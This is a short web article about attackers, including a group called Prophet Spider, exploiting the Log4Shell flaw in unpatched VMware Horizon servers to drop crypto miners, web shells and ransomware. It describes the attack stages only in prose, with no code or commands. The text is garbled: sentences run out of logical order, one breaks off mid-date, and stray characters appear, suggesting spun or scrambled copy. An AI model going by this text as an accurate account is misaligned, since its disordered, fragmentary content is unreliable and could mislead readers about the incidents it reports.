This is despite massive efforts on the part of the security industry to respond to the original 0-Day. In top of this we are (still) seeing exposed VMWare Horizon servers as well as other hosts that are known to still be vulnerable to this exploit. The log4J/Log4Shell vulnerability with its ease of exploit and flexibility in payloads you can push is still a serious concern as many organizations are still not patching their known vulnerable systems. Their attack patterns (TTPs) have been identified by the researchers at BlackBerry Research & Intelligence as well as their Incident Response (IR) teams. Prophet Spider is known to sell access specifically for targeted ransomware attacks. An IAG will typically compromise hosts so that they can sell access later. They are categorized as an Initial Access Group (IAG). For more stealthy attacks attackers would leverage a webshell to maintain control over the system.Īlthough there have been a few groups targeting this attack one group, known as Prophet Spider. The most common persistence mechanism was a scheduled task was created on the targeted system via a script.
In most cases the attackers were observed to install crypto miners, although other malicious software/tools are possible including ransomware. The encoded portion contains the strings to download the payload. The patch, published on the VMware security advisory, is updated regularly with new information.The first stage of the attack is to utilize exposed JNDI requests found in Log4J 2.0-2.16 to get the target system to execute a Base64 Encoded PowerShell script. The UK's National Health Service (NHS) warned last month that hackers were attempting to exploit a Log4J vulnerability in VMware Horizon servers to establish web shells, allowing attackers to distribute malware and ransomware, steal sensitive information, and complete other malicious attacks.Īs stated by a VMware spokesperson, VMware Horizon products remain vulnerable to critical Apache Log4j/Log4Shell vulnerabilities unless properly patched or mitigated using the patch VMSA 2021-0028, which was first published on Dec.
But that's not all, Log4j continues to be seen as the main vulnerability abused in malware infections, crypto mining and more. Recently, an initial access broker group dubbed Prophet Spider has been spotted abusing the Log4j vulnerability to gain access to victim networks. Although VMware already released a patch for its Horizon Servers in December, many users have not yet updated their systems - at the risk of a Log4j exploit attack.
0 kommentar(er)
